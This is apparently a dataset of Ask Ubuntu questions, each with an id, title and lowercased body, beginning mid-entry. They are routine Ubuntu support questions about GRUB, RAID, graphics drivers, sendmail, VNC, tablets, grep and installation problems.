/usr/share/netbeans/7.0.1/bin/../ruby : /usr/share/netbeans/7.0.1/bin/../python : /usr/share/netbeans/7.0.1/bin/../php : /usr/share/netbeans/7.0.1/bin/../visualweb : /usr/share/netbeans/7.0.1/bin/../soa : /usr/share/netbeans/7.0.1/bin/../identity : /usr/share/netbeans/7.0.1/bin/../uml : /usr/share/netbeans/7.0.1/harness : /usr/share/netbeans/7.0.1/bin/../cnd : /usr/share/netbeans/7.0.1/bin/../dlight : /usr/share/netbeans/7.0.1/bin/../groovy : /usr/share/netbeans/7.0.1/bin/../extra : /usr/share/netbeans/7.0.1/bin/../javafx : /usr/share/netbeans/7.0.1/bin/../javacard : '' -dnetbeans.home= '' /usr/share/netbeans/7.0.1/platform '' '-dnetbeans.importclass=org.netbeans.upgrade.autoupgrade ' '-dnetbeans.accept_license_class=org.netbeans.license.acceptlicense ' '-xx : maxpermsize=384m ' '-xmx768m ' '-client ' '-xss2m ' '-xms32m ' '-xx : permsize=32m ' '-dapple.laf.usescreenmenubar=true ' '-dapple.awt.graphics.usequartz=true ' '-dsun.java2d.noddraw=true ' '-dsun.java2d.pmoffscreen=false ' -xx : +heapdumponoutofmemoryerror -xx : heapdumppath= '' /home/jeggy/.netbeans/7.0/var/log/heapdump.hprof '' org.netbeans.main -- userdir `` /home/jeggy/.netbeans/7.0 '' `` -- branding '' `` nb '' 0 < & 0 jeggy @ jeggy-xps : ~ $ and then it creates this file in my home folder called hs_err_pid2687.log update : i 've downloaded the installer from their website the one with everything included . and i then ran the installation file 'sudo sh ./netbeans-7.4-linux.sh ' and got this : i guess you should tell us how you uninstalled and reinstalled java . i removed `` openjdk java 6 runtime '' and `` openjdk java 7 runtime '' and installed them again through the software center
406972	pipe viewer with nmap ( progress bar )	i would like to know if there is a way to use `` pipe viewer '' with `` nmap '' together . example : pv | nmap -sp 192.168.1.0/24 but i could n't get the progress bar working properly . i mean it should be telling me the percentage of nmap . starts from 0 % , when namp is done , it will be 100 % .
406975	tata docomo 3g dongle in linux [ mint or ubuntu ]	i need help connecting the tata docomo 3g dongle in linux.i searched everywhere on the internet and could not find any solution.i think all the required files are provided with the device : here is the overview of the folders : tools install.sh photon3g.tar zr in photon3g.tar we have the driver files of the device in tools we have : *2 folders : * deb rpm *in deb : * qt wvdial *in rpm : * libwvstreams-4.5.1-6.fc11.i586 wvdial-1.60-8.fc11.i586 please help me out !
406976	problem removing software raid from empty drives	i have inherited a 32 bit pc which has two sata drives and a hardware raid card setup for raid 1 mirroring . the pc is empty and as i need a local server for some web development work i decided to install 12.04 server on it . cd installing ok until i got to the drives part . one or more drives containing serial ata raid cofig found ... activate y/n ? whether i select `` y '' or `` n '' i end up in the partition disks menu . - configure lvm - config encrypted vol - config iscsi vol - raid 1 device # 126 - 78.2 gb software raid device - # 1 78.2 gb - 512.0 b unusable - raid 1 device # 127 - 4.1 gb software raid device - # 1 4.1 gb - 512.0 b unusable which i presume is telling me i have softwareraid from a previous incarnation - and i do n't want it . but i do n't seem to be able to get rid of it . all i can do in the `` # 1 '' options is erase all data - which i have done . i read somewhere that i can only remove the software raid by booting with live cd and doing it from there .. i tried ( 32 bit 12.04.3 cd ) but as soon as i go into the `` try ubuntu '' i get a million error messages flying past .. unable to find directory/file combinations till it hangs . so where from here ?
406984	what is the universe and the multiverse and how do you use them in the synaptic package manager	i have recently installed the synaptic package manager and there are various options related to the universe and the multiverse in it . what exactly are they and how do you you use the synaptic package manager with them
406987	how to make vnc viewer render faster by selecting which screen to transmit or by any other means	i have following in my vnc startup script at my work computer x11vnc -ncache 10 -rfbport 5910 -safer -forever -once -display :0 -rfbauth /home/username/.vnc/passwd 2 > /dev/null 1 > 2 & when i access the work computer from home using vncviewer ( in windows 8 ) , it is super slow . is there anything i can change in my vnc startup script which would help with speed ? i have already done obvious things , like suppressing the wallpaper and lowering the resolution , but still it is very slow . i have two smaller 20 inch screens at work and at home i a have big 27 inch monitor , in vncviewer at home i notice that i get the entire first screen and partial of second screen from work computer . i think if i somehow limit vnc server to transmit just 1st main screen from work computer , that should help speed up the rendering at home computer . what would be the switch to select a screen on vnc server side . the internet connection speed at work right now is 20mbps download and 1mbps upload .
406989	which nvidia card driver do i choose ?	i am looking at the tab `` addition drivers '' in the `` software & updates '' window , and i am seeing 5 options . it is quite clear that the last option must be the open source version of my graphic card driver . but what about the other 4 ? what is each , and which one should i chose to perform better ?
406991	ubuntu lampp sendmail configuration for gmail	i need to configure the sendmail on ubuntu with lampp . so here is what i did sendmail configuration updated the sendmail.mc with smtp.gmail.com then i ran the m4 sendmail.mc checked sendmail was running i tried sending an email from the command line and it does not go through . so what am i missing here ? update i followed the instructions given here when i try to send a mail in the command line using the command echo `` my test email being sent from sendmail '' | /usr/sbin/sendmail celestialcitizen @ gmail.com i get the following output log in my /var/mail/root from mailer-daemon thu jan 23 04:11:56 2014 return-path : received : from 530bffe8-3ff6-cd07-f6f2-bc4a9abd8dc1 ( localhost [ 127.0.0.1 ] ) by 530bffe8-3ff6-cd07-f6f2-bc4a9abd8dc1 ( 8.14.4/8.14.4/debian-2ubuntu2.1 ) with esmtp id s0n4buop003474 ( version=tlsv1/sslv3 cipher=dhe-dss-aes256-sha bits=256 verify=no ) for ; thu , 23 jan 2014 04:11:56 gmt received : from localhost ( localhost ) by 530bffe8-3ff6-cd07-f6f2-bc4a9abd8dc1 ( 8.14.4/8.14.4/submit ) id s0n4bugs003451 ; thu , 23 jan 2014 04:11:56 gmt date : thu , 23 jan 2014 04:11:56 gmt from : mail delivery subsystem message-id : < 201401230411.s0n4bugs003451 @ 530bffe8-3ff6-cd07-f6f2-bc4a9abd8dc1 > to : root @ 530bffe8-3ff6-cd07-f6f2-bc4a9abd8dc1 mime-version : 1.0 content-type : multipart/report ; report-type=delivery-status ; boundary= '' s0n4bugs003451.1390450316/530bffe8-3ff6-cd07-f6f2-bc4a9abd8dc1 '' subject : returned mail : see transcript for details auto-submitted : auto-generated ( failure ) this is a mime-encapsulated message -- s0n4bugs003451.1390450316/530bffe8-3ff6-cd07-f6f2-bc4a9abd8dc1 the original message was received at thu , 23 jan 2014 04:11:56 gmt from root @ localhost -- -- - the following addresses had permanent fatal errors -- -- - celestialcitizen @ gmail.com ( reason : 554 5.3.5 buildaddr : unknown mailer unknown ) ( expanded from : celestialcitizen @ gmail.com ) -- -- - transcript of session follows -- -- - ... while talking to [ 127.0.0.1 ] : data < < < 554 5.3.5 buildaddr : unknown mailer unknown 554 5.0.0 service unavailable < < < 503 5.0.0 need rcpt ( recipient ) -- s0n4bugs003451.1390450316/530bffe8-3ff6-cd07-f6f2-bc4a9abd8dc1 content-type : message/delivery-status reporting-mta : dns ; 530bffe8-3ff6-cd07-f6f2-bc4a9abd8dc1 arrival-date : thu , 23 jan 2014 04:11:56 gmt final-recipient : rfc822 ; celestialcitizen @ gmail.com action : failed status : 5.3.5 remote-mta : dns ; [ 127.0.0.1 ] diagnostic-code : smtp ; 554 5.3.5 buildaddr : unknown mailer unknown last-attempt-date : thu , 23 jan 2014 04:11:56 gmt -- s0n4bugs003451.1390450316/530bffe8-3ff6-cd07-f6f2-bc4a9abd8dc1 content-type : message/rfc822 return-path : received : ( from root @ localhost ) by 530bffe8-3ff6-cd07-f6f2-bc4a9abd8dc1 ( 8.14.4/8.14.4/submit ) id s0n4bugr003451 for celestialcitizen @ gmail.com ; thu , 23 jan 2014 04:11:56 gmt date : thu , 23 jan 2014 04:11:56 gmt from : root message-id : < 201401230411.s0n4bugr003451 @ 530bffe8-3ff6-cd07-f6f2-bc4a9abd8dc1 > my test email being sent from sendmail -- s0n4bugs003451.1390450316/530bffe8-3ff6-cd07-f6f2-bc4a9abd8dc1 --
406994	ubuntu 12.04 graphic error on boot after update from 10.04	after an update to ubuntu 12.04 from 10.04 , i have a strange problem : in grub menu if i select ubuntu kernel 3.2.0-58-generic the graphical interface just hangs there , i get this black screen with a blinking cursor at the top . it does react to crt+alt+f2 and ctr+alt+supr and then it reboots . then i select the other kernel which is the recovery and i enable networking and then drop to root shell i do /etc/init.d/lightdm start and then once it managed to boot normally and was working , kind of . it 's dell t7500 desktop with quadro 600 nvidia graphic card . i have blacklisted -nouveau and i am using nvidia driver 310.19 downloaded from their website . i have previously purged nvidia and reinstalled xorg , gdm , lightdm several times , tried using gdm over lightdm ... i have gnome3 desktop i have then updated nvidia driver using nvidia-installer -- update and now it 's 310.20 after last reinstall of lightdm even /etc/init.d/lightdm start does n't work . i have tried to boot in failsafe graphic mode but still but it says no screen found ( i have a screen obviously ) . i have checked the /var/log/xorg.failsafe.log and basically here are some of the messages : loading -- - vesa driver ignoring device with a bound kernel ... screens found but none with usable configuration fatal server error no screens found i have tried this : sudo x -configure sudo mv xorg.conf.new /etc/x11/xorg.conf then since it dind't work i ran nvidia-xconfig any other staff i could do ? thanks edit : i installed dgm and then i did service gdm start and then startx and got the purple ubuntu screen which seems better than black screen but is not as ctr+alt+supr does n't work edit2 : i have removed lightdm and installed gdm . so now if i try to boot normally it also crashes ( shows weird screen half purle half black ) but if i choose the recovery kernel and then slect the option boot normally it boots fine using gdm .
407001	personal files disappeared after ubuntu upgrade	i was coming from ubuntu 12.04 , i upgraded to ubuntu 13.10 with a live cd today . something went wrong in the installation executing 'grub-install/dev/sda7/ ' failed this is a fatal error now , i think i told the installation program to go on without grub . so , when i rebooted , it came up with : error : unknown filesystem grub rescue > so i managed to repair the grub by using the informations contained here now , ubuntu starts , however all my files are completely disappeared . in the menu bar there is a button linking to `` install release '' as if the distribution was n't correctly installed . normally i would have said that my files got deleted during the update , but if i run the installation from the aforementioned button , the partition is full by approx 10 gb , which is the size my system was occupying before the installation . some other details might be useful because i had some problems in resizing the partition itself before the update : i will write about them in case it is necessary . can you suggest something to restore my files ? thank you
407002	zune alternatives	are there any zune ( http : //www.windowsphone.com/en-us/how-to/wp7/zune-software ) alternatives available for ubuntu ( or any linux distro ) that seem reliable for a windows phone ? i managed to talk in my girlfriend to switch from windows to ubuntu and she seems to enjoy this distro a lot but the only thing she misses is this zune software for her windows phone . i tried to install virtualbox w/ windows 7 + guest additions and extension pack as well , but her phone could n't get recognized by zune inside virtualbox ( windows 7 ) . the only idea i have left is to install ubuntu alongside windows ( dual - boot ) but i believe that any alternative would be a better solution to this problem ( since dual-boot would require constant restart between the two os and it is kinda annoying ) .
407003	problem creating boot option for usb	i have a bootable usb stick with ubuntu 13.10 , but my asus g74 laptop does n't have a boot option for usb . i can create one , but it asks for a path . the drive is the g drive , is it then /boot/grub ? what am i missing ?
407004	install ubuntu and remove windows	i want to install ubuntu and remove windows 8.1 . will the installation remove windows automatically ?
407005	hdmi not recoginised by ubuntu 12.04	i recently installed ubuntu and now i want to connect it to an external monitor using the hdmi port . the cable is not faulty , i have tested it with another device . the laptop is not reading anything from the hdmi port . system settings - > displays only shows my laptop and no monitor . it worked with the same laptop , cable and monitor when i was running windows 7 . not sure if it 's relevant but fn+f7 ( to switch between monitor views ) also does n't work since i switched to ubuntu . specs : sony vaio laptop ubuntu 12.04 lts integrated gpu ( intel sandybridge mobile )
407006	how to redefine nautilius unmount to turn off the unmounted hard drive as well ?	i have just installed an hdd caddy for my second hard drive . i would like nautilus to turn it off when all of its partitions are turned off ( to simplify it we can assume that there is only one partition ) . the idea is to launch $ sudo hdparm -y /dev/sdb after all partitions of this drive have been unmounted . how can i `` redefine '' nautilius ' unmount command to work that way ?
407009	lenovo y510p with hdmi monitor ( resolved )	when i boot from ubuntu 13.10 64 bit live from usb , then secondary monitor on hdmi works fine . after installing ubuntu , the secondary monitor on hdmi port does n't work . if i reboot with live ubuntu , then monitor works again . is it a bug ? is there a patch or a workaround ? lenovo y510p notebook , intel hd4600 vga lsmod after live boot : http : //pastebin.com/977j4mzv lsmod after install : http : //pastebin.com/pdfctjfj update : lshw -c video | grep configuration when i boot from live usb : configuration : driver=i915 latency=0 ( dual monitor works ) when i boot from ssd : configuration : latency=0
407010	is there a way to increase the upload limit wtih the nginx charm ?	am using wordpress in juju cloud ... ..when trying to upload a theme of more than 500 kb ... its showing `` 413 request entity too large '' nginx/1.1.19 .. i just followed the following process to install wordpress on juju `` https : //juju.ubuntu.com/docs/ '' is there any solution to increase the uploading limit ... ..i searched for the nginx.conf ... but its not there on /etc or in /var/local
407011	an error occurred while mounting	well i 'm elbow deep in new territory , built my first pc and decided to load it with ubuntu . i have no idea where i am ... here 's the skinny . this is my stuff : asrock 970 extreme3.0 r2.0 amd fx 4130 quad core radeon sapphire hd7870 seagate barracuda 2tb 7200rpm sata3 2 x 4gb kingston ddr3 hyperx genesis 1600 mhz corsair 650w made a usb boot drive with that linux pen drive installer ( tried 13.10 , then tried 12.04.3 ) . v13.10 gives me a black/purple screen after the load screen . running the `` check disc for defects '' showed there were two files with errors . so i loaded v12.04.3 and then it said there were 3 files with errors . i tried to run before installing but the next message was '' an error occurred while mounting '' so . where do i start ? is it possible my hdd is doa ? thanks very much in advance .
407012	gather discrete gpu temperature optimus	i run nvidia optimus using bumblebee . is there a way to check discrete gpu temperature while running applications with optirun ?
407013	limited access to shared folders	i have the following configuration : media pc with ubuntu 12.04 which has an external disk connected via usb . the external disk has two partitions , one for data and one for media . additionally the media-pc has two internal partitions for media and data . i accomplished to mount all partitions mentioned above by adding them to fstab in the way i wanted . my goal is it to access the named partitions from my working laptop from different accounts . therefore i shared the partitions with nautilus on the media-pc . i am now able to access the shared files via smb// : mediapcname from my account ( which is su ) . but now i have two problems : when i access a shared folder/partition everything is ok . i can access the subfolders and so on . then i can access a second folder in the same way . but always when trying to access a third location i am `` unable to access location ... .connection timed out '' . i 've tried it out and it is not depending on one specific location . it 's always the third one which gives me the error . second thing is that i was not able to access the shared folder from a 'normal ' user account . would be nice if someone could support here . i have to confess that i am not really knowing what i am doing . what i 've done so far was painful collected from different places , mainly from here , which i have to say is a very useful forum . can someone advise good literature about the network-shares-topic ? thanks a lot in advance ... here are the ll-outputs as recommended : total 514753 drwxrwx -- - 1 michael server 4096 jan 16 20:56 ./ drwxr-xr-x 6 root root 4096 jan 12 19:54 ../ drwxrwx -- - 1 michael server 12288 jan 11 20:56 bilder/ drwxrwx -- - 1 michael server 8192 jan 11 20:56 buecher/ drwxrwx -- - 1 michael server 4096 jan 11 20:57 comedy/ -rwxrwxrwx 1 michael server 524288000 apr 30 2012 crypt* drwxrwx -- - 1 michael server 561152 jan 16 21:25 ebooks/ lrwxrwxrwx 1 michael server 60 jan 16 20:55 link to buecher - > /media/mediaserver/buecher/ lrwxrwxrwx 1 michael server 58 jan 16 20:56 link to ebooks - > /media/mediaserver/ebooks/ drwxrwx -- - 1 michael server 36864 jan 11 20:57 livesets/ drwxrwx -- - 1 michael server 36864 jan 13 20:18 movies/ drwxrwx -- - 1 michael server 2138112 jan 11 20:57 musik/ drwxrwx -- - 1 michael server 0 jan 2 2012 .trash-1000/ drwxrwx -- - 1 michael server 0 may 20 2013 .trash-1001/ drwxrwx -- - 1 michael server 12288 jan 11 20:57 videos/ total 68 drwxrwxrwx 14 michael root 4096 jan 8 19:41 ./ drwxr-xr-x 6 root root 4096 jan 12 19:54 ../ drwx -- -- -- 2 michael root 16384 sep 6 2011 lost+found/ drwxr-xr-x 42 michael root 4096 apr 22 2012 sicherung_daten_20120422/ drwxrwxr-x 43 michael michael 4096 nov 1 17:23 sicherung_daten_20131101/ drwxrwxr-x 45 michael michael 4096 jan 8 19:39 sicherung_daten_20140108/ drwxr-xr-x 56 michael root 4096 apr 22 2012 sicherung_home_20120422/ drwxrwxr-x 25 michael michael 4096 nov 1 17:47 sicherung_home_20131101/ drwxr-xr-x 6 michael root 4096 dec 11 2011 sicherung_home_20140107/ drwxrwxr-x 6 michael michael 4096 jan 8 19:47 sicherung_media_20140108/ drwxrwxr-x 29 michael michael 4096 nov 27 20:45 sicherung_stick_i/ drwxrwxr-x 35 michael michael 4096 dec 30 12:43 sicherung_stick_ii/ drwx -- -- -- 4 michael root 4096 nov 1 17:50 .trash-0/ drwx -- -- -- 4 michael michael 4096 apr 22 2012 .trash-1000/ total 8 drwxrwx -- - 1 michael server 4096 jan 11 15:55 ./ drwxr-xr-x 6 root root 4096 jan 12 19:54 ../ -rwxrwxrwx 1 michael server 0 jan 11 15:55 untitled document* total 8 drwxrwx -- - 1 michael server 4096 jan 11 15:55 ./ drwxr-xr-x 6 root root 4096 jan 12 19:54 ../ -rwxrwxrwx 1 michael server 0 jan 11 15:55 untitled document*
407014	installing gedit 3.11.2	i am trying to install gedit 3.11.2 from : https : //git.gnome.org/browse/gedit for some reason , it does not work on my ubuntu 13.10 the file ./configure is not found . i followed the steps in the readme file : % tar jxf gedit-3.11.2.tar.xz # unpack the sources % cd gedit-3.11.2 # change to the toplevel directory % ./configure # run the `configure ' script % make # build gedit [ become root if necessary ] % make install # install gedit but then , the configure is not found . am i missing something here ?
407017	get wacom ctl-480 to show up in gnome-control-center ?	i have installed support for ctl-480 tablet as per : why is my wacom intuos tablet not detected ? . thus , the pen moves the pointer and clicking all the buttons on the pen works . however , the tablet does not show up in gnome-control-center > wacom graphics tablet > which just displays `` no tablet detected , please plug in or turn on your wacom tablet '' . do i need to update or install something to get it to show or is this settings manager independent of getting the drivers to work ? i am trying to remap one of the buttons to middle click . ubuntu 12.10 , cinnamon .
407018	which is the recommended driver for my graphics card ?	i have a dell latitude e6500 with ubuntu 12.04 lts and after a fresh reinstall , i notice some sluggishness , which is probably due to the video drivers . my graphics card is a nvidia quadro nvs 160m . when i open additional drivers , there are various options but i do n't know which is the best one . many thanks . this is what i get with sudo lshw -c video *-display description : vga compatible controller product : g98m [ quadro nvs 160m ] vendor : nvidia corporation physical id : 0 bus info : pci @ 0000:01:00.0 version : a1 width : 64 bits clock : 33mhz capabilities : pm msi pciexpress vga_controller bus_master cap_list rom configuration : driver=nvidia latency=0 resources : irq:16 memory : f5000000-f5ffffff memory : e0000000-efffffff memory : f2000000-f3ffffff ioport : df00 ( size=128 ) memory : f4000000-f401ffff
407021	spice-xpi for ubuntu 12.04	im trying to install spice-xpi for ubuntu 12.04 . found a ppa , but it crashes ... trying to compile from source but got stop at ./configure : checking for xul ... no configure : error : package requirements ( libxul-embedding > = 1.9 nspr > = 4.7.1 ) were not met : no package 'libxul-embedding ' found no package 'nspr ' found consider adjusting the pkg_config_path environment variable if you installed software in a non-standard prefix . alternatively , you may set the environment variables xul_cflags and xul_libs to avoid the need to call pkg-config . see the pkg-config man page for more details . couldnt find package or directorypath that would provide me this libraries any help much apreciate it . regards .
407022	ca n't connect to one specific wi-fi on 12.04.3	i recently downloaded ubuntu 12.04.3 , but i ca n't connect to one of my wireless internet . when i tried connect to one , it went ok . but when i try to connect with another , the message `` password or encryption key are required to access the wireless network `` * '' . please help me !
407023	my intuos ctl-480 used to work on my computer but now is not detected	i use ubuntu 13.10 o.s . and less than a month ago i bought a tablet - intuos ctl-480/s . i had a break in using it and now for some reasons it 's not detected by my computer . i have no idea why because it used to work perfectly . do you have any advice ?
407025	skype audio problem with 12.04	logitech h800 wireless/bluetooth headset works ok with all apps except skype ! in options/audio there is no specific h800 bluetooth driver listed . the logitech drivers that are listed do not work . anybody any ideas ?
407030	how to configure grub loader during apt-get upgrade on ubuntu 12.04	i have a box with ubuntu 12.04 , and just did a apt-get upgrade . i 'm presented with a dialogue to update my grub bootloader , but with the following message : the grub boot loader was previously installed to a disk that is no longer present , or whose unique identifier has changed for some reason . it is important to make sure that the installed grub core image stays in sync with grub modules and grub.cfg . please check again to make sure that grub is written to the appropriate boot devices . if you 're unsure which drive is designated as boot drive by your bios , it is often a good idea to install grub to all of them . note : it is possible to install grub to partition boot records as well , and some appropriate partitions are offered here . however , this forces grub to use the blocklist mechanism , which makes it less reliable , and therefore is not recommended . grub install devices : [ ] /dev/sda ( 3000592 mb ; st3000dm001-9yn166 ) [ ] /dev/sdb ( 3000592 mb ; st3000dm001-9yn166 ) [ ] /dev/md1 ( 536 mb ; rescue:1 ) [ ] /dev/md2 ( 1099510 mb ; rescue:2 ) i 'm worried that choosing the wrong option will render my box unbootable . i do n't have physical access to it , as it 's a box in a cloud . please advice ! edit : this is my /etc/fstab : proc /proc proc defaults 0 0 /dev/md/0 none swap sw 0 0 /dev/md/1 /boot ext3 defaults 0 0 /dev/md/2 / ext4 defaults 0 0 /dev/md/3 /home ext4 defaults 0 0 this is my df -h : filesystem size used avail use % mounted on /dev/md2 1016g 127g 838g 14 % / udev 16g 4.0k 16g 1 % /dev tmpfs 6.3g 768k 6.3g 1 % /run none 5.0m 0 5.0m 0 % /run/lock none 16g 0 16g 0 % /run/shm /dev/md1 496m 44m 427m 10 % /boot /dev/md3 1.7t 368g 1.3t 23 % /home
407036	how do i configure the entries that appear in the burg menu ?	i am experimenting with burg to make the boot menu look a bit nicer ( i am dual booting w7 and ubuntu 12.04 lts ) . i managed to install burg and selected my chosen theme , but i ca n't find a way to remove or rename entries on the menu ! i have about 4 or 5 different ones , but all i want to see is ubuntu 12.04 and windows 7 . how do i do this ? i have tried super boot manager , i have tried editing the burg files , but i can not figure out how to do this . this is one of the things that i find irritating as someone who is trying to learn ubuntu - nothing is ever simple !
407044	does ubuntu support my hardware ?	hello im new in this community , i liked ubuntu os but i do n't know if ubuntu support my hardware is a hp pavilion dv4-4075la entertainment pc and this is his hardware . this are the specs of my pc i want to play games like team fortress 2 , sims 3 ( i know i need to use virtual box or playonlinux ) my computer actually have windows 7 home basic and runs those games at medium high , i dont want to have lag on those games . another thing , i want to install ubuntu 12.04 lts on my pc : d and sorry for my bad english i 'm a noob in the english.greeting !
407047	how to maintain juju charm version	from charm documentation it says : revision is now deprecated . how charm writer maintain version information ?
407050	after removed app , the launcher keeps at unity	i 've downloaded manage-launcher from software center then , after , have removed it . but it keeps at the unity . i 've already seek for the .desktop file at /usr/share/applications , but nothing is there . edit : the software is free , however proprietary .
407051	links between files in u1	i know how to produce links to share files . i would like to do this with a file called inde.html , which is a tiny web page , containing links to other files stored in the same folder ( in u1 ) . this does n't seem to work , though . i tested , but the link is broken . a not very elegant solution is to produce the liks to share every time i want to add a new file ... but this wo n't ( will ? ) work if , for instance , i want to include images in my index.html page , or in some other of the documents . yes , what i want to so is a micro-site . finding a hosting solution could certainly work , but what i want to share is so small ... any ideas ? thanks in advance .
407053	why is my grep + regex not working ?	i recently decided that enough was enough -- i was going to learn to use grep fluently . it 's been all of three hours and i 'm already stumped by this toy problem . i 'm currently syncing a raid5 array , the progress of which can be monitored by reading /proc/mdstat . the output of cat /proc/mdstat is shown below . $ cat /proc/mdstat personalities : [ linear ] [ multipath ] [ raid0 ] [ raid1 ] [ raid6 ] [ raid5 ] [ raid4 ] [ raid10 ] md1 : active raid5 sda4 [ 0 ] sdb4 [ 1 ] sdc4 [ 2 ] 5858765824 blocks super 1.2 level 5 , 512k chunk , algorithm 2 [ 3/3 ] [ uuu ] [ ============= > ... ... . ] resync = 67.3 % ( 1972073120/2929382912 ) finish=205.7min speed=77537k/sec md0 : active raid5 sda3 [ 0 ] sdb3 [ 1 ] sdc3 [ 2 ] 998400 blocks super 1.2 level 5 , 512k chunk , algorithm 2 [ 3/3 ] [ uuu ] unused devices : < none > for fun , i thought i would use watch to monitor /proc/mdstat in real time , pipe it 's output into grep , and show only the estimated remaining time . my approach is as follows : watch cat /proc/mdstat | grep finish=\d+\.\d | grep \d+\.\d i 'm stumped as to why this produced no output . in fact , the first grep expression produces no output , even though it seems to work on regex101 . what am i doing wrong ?
407056	ibm serveraid manager ( application cd v 9.30 )	is there a way to install ibm serveraid manager from the `` ibm serveraid application cd 9.30 '' to run it in ubuntu desktop and/or command line environments ? after installing ubuntu 12.4.x on 3 ibm servers , it 's become a total nuisance to check/manage ibm serveraid-8k controller by booting from the cd every time . also , raid manager would help with notification services . the ibm 's `` application support cd v. 9.30 '' contains several versions of `` raidman '' for linux and windows os , but none seems to fit ubuntu 12.4.3 lts
407057	how to format hard drive	i have installed bootable ubuntu on hard disks but now i can not format them with disk utility program . when i try to format it says `` one or more partitions are busy on /dev/sdb '' for both hard disks . is there any way to format these drives ? edit : with `` disk utility '' program when i select one of the hard drives it shows 3 volumes ; 99 mb fat 111 gb ext4 9 gb unknown i can not format this unknown volume . with gparted program , it does n't shows unknown volume only shows 111gb ext4 .
407060	how to get last updates from all repositories	i say that because i 'm using ubuntu and arch linux . i like arch because the last updates ... last ruby , python , php , apache ( i 'm a web developer ) , java , etc . for me , this is very important . but everytime i want that in ubuntu , i need found many ppas and add them , and update , and , and ... for me , this `` operation '' is exhausting and boring , and in bad situation , can generate a lot errors in my ubuntu . so ... have a option , or a master ( debian/arch ) repository with the last updates of `` everthying '' ? or something like yum/pacman : download source and compile for ubuntu . and of course , i say that because i love the usability of ubuntu and unity ... so i want stay here .
407066	how to install ubuntu on my lenovo which has four partitions	i own a lenovo y580 ideapad and in the process of installing ubuntu through a usb i can not install alongside windows as it already has four partitions : /dev/sda1 ( windows 7 loader ) ntfs ( size 209mb used 70mb ) /dev/sda2 ( windows 7 loader ) ntfs ( size 451577 used unknown ) /dev/sda3 ntfs ( size 27346mb used 4114mb ) /dev/sda4 ( windows recovery environment loader ) ntfs ( size 20972mb used 13354mb ) if possible should i delete one of these partitions to make room for ubuntu ? how would i go about deleting it ? and how would it change my computers performance in any way ? thanks in advance to any who may answer .
407067	cd rom copy how can i copy music direcly to my computer and not a cd	how can i copy a cd into my computer ? i tried extract juicer but it doesnt have the mp3 option and when i choose another it brings the cd but when i put extract it does n't do it . how can i do this , is it posible in ubuntu as in windows . or itunes to just extract tracks directly into your computer without having to burn a cd ? thanks in advance for your help .
407068	xubuntu persistence . plop loading usb and no hard drive . -how to ?	i have an old laptop that will not boot from usb , so i am using either a live cd or plop linux to boot a live usb ( i have n't decided which yet ) of xubuntu 12.04.3-desktop-i386 . the laptop does not have a hard drive , so i am using a 60gb video ipod as an external hard drive . i would like to save all changes to the os ( programs added , settings changed , that sort of thing . ) to a persistence file on the ipod , which would be read on boot . how do ?
407071	connecting windows to ubuntu	i 'm looking to get a little help in configuring my kubuntu desktop . my goal is to have my windows pc connect via ethernet to the kubuntu system via remote desktop and then use kubuntu to browse the web . i have xrdp already installed but having issues with ethernet portion
407075	how to read `` service -- status-all '' results	i need to identify the currently running services but i ca n't figure out the results of running service -- status-all , i mean what does ? , - and + mean ? $ service -- status-all [ + ] acpid [ + ] anacron [ + ] apparmor [ ? ] apport [ ? ] atieventsd [ + ] avahi-daemon [ ? ] binfmt-support [ + ] bluetooth [ - ] brltty [ + ] console-font [ + ] console-setup [ + ] cron [ + ] cups [ + ] cups-browsed [ - ] dbus [ ? ] dns-clean [ + ] friendly-recovery [ - ] grub-common [ ? ] irqbalance [ - ] kerneloops [ ? ] killprocs [ + ] kmod [ ? ] lightdm [ - ] lm-sensors [ ? ] mysql [ ? ] networking [ ? ] ondemand [ ? ] pppd-dns [ - ] procps [ - ] pulseaudio [ ? ] rc.local [ + ] resolvconf [ + ] rfkill-restore [ + ] rfkill-store [ - ] rsync [ + ] rsyslog [ + ] saned [ ? ] sendsigs [ + ] setvtrgb [ ? ] speech-dispatcher [ - ] sudo [ + ] timidity [ + ] udev [ ? ] umountfs [ ? ] umountnfs.sh [ ? ] umountroot [ - ] unattended-upgrades [ - ] urandom [ + ] virtualbox [ - ] x11-common and would running this command with sudo make any difference ? i tried it and in my case it did n't make any difference , but may it differ in other setups ?
407080	ubuntu 12.04.3 wo n't install/run on mint16 machine	i 'm a complete newbie . installed linux mint 16 3 weeks ago but i find it difficult to find answers for this distro - nearly always google gives me ubuntu answers to try . i 've just burnt a dvd with ubuntu 12.04.3 but my desktop after asking me what system i want to boot into just opens up in mint 16 . any help would be appreciated .
407081	rendering video that was edited in a windows virtualbox	i created a video project using adobe premiere on my xubuntu computer that was running windows 7 within virtualbox . the problem is that the renderings come out looking terrible . for example , plain text moving across the screen becomes jagged and low-res . i think the fact that i can not use all of my computer 's resources to render within virtualbox is the problem . so my question is : is there some way that i can take the adobe premiere project file ( and all of the related files ) and just render it in xubuntu ?
407083	ubuntu install freezes using every method on windows xp	i 'll list the information i know , but i 'm not a programmer or computer whiz so if you need more please explain how i can obtain it for you . i 'm trying to install ubuntu on a sony vaio laptop , running an intel centrino 1.73mhz processor with 502mb ram . i 've now tried every method i know of and none of them work . here 's what happens : from usb : i could n't figure out how to get the computer to boot from usb so i could n't even try that one . from dvd : the computer boots the disc and i can access the menu fine . however after selecting either 'install ' or 'try without installing ' , it freezes after 10-30seconds of the red dot loading sequence . never gets past that , just stops and remains like that until i hold the power button down and restart the computer . i performed both a cd and memory check and both passed without problems . from unetbootin : i access the menu , select 'install ' and it does n't freeze on the red dot sequence but rather comes up afterwards with a command style interface and the message : `` ( initramfs ) unable to find a medium containing a live file system '' then remains like that . again , i manually shut the computer down . from wubi : i downloaded wubi and went through the installation process so that in my add/remove programs list on windows , ubuntu is now listed as 30,000mb and installed . however every time i choose ubuntu for it to complete the installation process , it simply gets stuck on the red dots . i just want to install ubuntu and would really appreciate any help , keeping in mind i 'm not familiar with code and programming . also i 'm attempting to install the 32-bit desktop version . hope to hear from someone soon ! thanks a lot .
